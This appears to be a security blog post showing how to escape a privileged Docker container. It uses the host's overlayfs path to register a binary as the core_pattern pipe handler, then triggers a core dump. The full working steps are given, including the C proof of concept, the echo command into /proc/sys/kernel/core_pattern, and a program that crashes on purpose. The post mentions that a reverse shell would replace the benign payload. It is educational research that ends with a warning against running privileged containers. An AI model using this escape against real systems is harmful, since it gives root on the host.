Escaping privileged containers for fun

Escaping a privileged Docker container isn’t a ‘real’ vulnerability, but it’s still pretty fun. And since there will always be people who find reasons (or excuses) to run privileged containers, even though they really shouldn’t, this trick may well come in handy someday.

Prompted by the recent cgroup release_agent escape (CVE-2022-0492), I went looking for callers of the call_usermodehelper_* family of functions and tried to work out which ones can easily be reached from inside a container.

Before looking at the results, it helps to know what call_usermodehelper does: it lets the kernel start a program in user mode. That program runs as root in the host’s initial namespaces, not in the namespaces of whoever caused it to run, which makes it a rather convenient feature for security researchers ;).

A quick grep showed that the kernel’s coredump handling code (do_coredump in fs/coredump.c) calls this function. Here is the relevant excerpt:

for (argi = 0; argi < argc; argi++)
        helper_argv[argi] = cn.corename + argv[argi];
helper_argv[argi] = NULL;

retval = -ENOMEM;
sub_info = call_usermodehelper_setup(helper_argv[0],
                                helper_argv, NULL, GFP_KERNEL,
                                umh_pipe_setup, NULL, &cprm);
if (sub_info)
        retval = call_usermodehelper_exec(sub_info,
                                          UMH_WAIT_EXEC);

kfree(helper_argv);

This looked like a promising target, especially since nothing stops us from triggering a core dump inside a container, right? (Core dump handlers such as apport and systemd-coredump would also be interesting to investigate at some point.)

The remaining question was how to reach this code path in the first place. Fortunately, a quick look at man 5 core explains exactly how it works!

From the man page: “Since kernel 2.6.19, Linux supports an alternate syntax for the /proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the remainder of the line is interpreted as the command-line for a user-space program (or script) that is to be executed.”

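In other words, if we write the path of our “evil” program, prefixed with a pipe, to /proc/sys/kernel/core_pattern, the kernel will execute that program outside of our container whenever a process dumps core. A privileged container can do this because /proc/sys is mounted read-write inside it, and core_pattern is not namespaced, so the change applies to the whole host.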

One prerequisite is that the path has to point to our binary from the host’s point of view, because the kernel resolves it in the host’s filesystem rather than the container’s. Fortunately, the directories that OverlayFS (the filesystem behind Docker’s default overlay2 storage driver) combines into the container’s root filesystem are ordinary directories on the host. Running mount inside the container reveals where they are. Let’s take a look at the results.

root@80f74c2d80e5:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/VNLJAHVXND5S423TW3TWVSKI7G:/var/lib/docker/overlay2/l/HMQWWMKA2U45KTCTUVDFHWCHQ2,upperdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff,workdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/md2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/md2 on /etc/hostname type ext4 (rw,relatime)
/dev/md2 on /etc/hosts type ext4 (rw,relatime)
devpts on /dev/console type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)

The first line shows that the writable upper layer (upperdir, the ‘diff’ directory) is /var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff. This is the actual path of that directory on the host, and any file we create in the container’s root filesystem ends up there.

We can verify this by creating a file with a distinctive name in the container and then searching for it with find on the host:

# make the file in the container
root@80f74c2d80e5:/# echo "hi host" > bladiebladiebla.txt

# find the file on the host
$ find / -name "bladiebladiebla.txt"
/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff/bladiebladiebla.txt
/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/merged/bladiebladiebla.txt

# check its contents on the host
$ cat /var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff/bladiebladiebla.txt
hi host

So the plan is: create a binary in the container (we already know where it will show up on the host), set it as the command in /proc/sys/kernel/core_pattern, and then trigger it by generating a core dump!

Let’s test this with a minimal C program that writes a message to /tmp/hacked. Since the kernel will run it on the host, this is the host’s /tmp, not the container’s.

#include <stdio.h>

int main(void)
{
    /* Runs on the host as root, so this is the host's /tmp. */
    FILE *fp = fopen("/tmp/hacked", "w");
    if (fp == NULL)
        return 1;
    fprintf(fp, "Hello from the container!\n");
    fclose(fp);
    return 0;
}

Let’s write this file to the container, compile it and register it as the core dump handler.

# write poc to system
root@80f74c2d80e5:/# vim poc.c
# compile it
root@80f74c2d80e5:/# gcc -o poc poc.c
# find the upperdir (the 'diff' directory) in the mount options
root@80f74c2d80e5:/# mount | head -n 1
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/VNLJAHVXND5S423TW3TWVSKI7G:/var/lib/docker/overlay2/l/HMQWWMKA2U45KTCTUVDFHWCHQ2,upperdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff,workdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/work)
# make the kernel run our binary, via its host path, on every core dump
root@80f74c2d80e5:/# echo "|/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff/poc" > /proc/sys/kernel/core_pattern

The only thing left is to trigger a core dump! There are many ways to do this, but I usually just write some plainly broken C (let’s pretend that’s intentional).

// pretty sure this crashes :)
int main(void) {
	char buf[1];
	for (int i = 0; i < 100; i++) {
		buf[i] = 1;
	}
	return 0;
}

Let’s write it to the system, compile it and trigger it!

# write the file to the system
root@80f74c2d80e5:/# vim crash.c
# compile the binary
root@80f74c2d80e5:/# gcc -o crash crash.c
# crash all the things!
root@80f74c2d80e5:/# ./crash
*** stack smashing detected ***: terminated
Aborted (core dumped)

If we now look at /tmp/hacked on the host, we can see that our program ran there and wrote our content!

$ cat /tmp/hacked
Hello from the container!

In a real-world scenario you’d probably start a reverse shell or something similar instead of simply writing to /tmp/hacked; this was just an example to illustrate the concept. And keep in mind: privileged containers should NOT be run.

Cheers!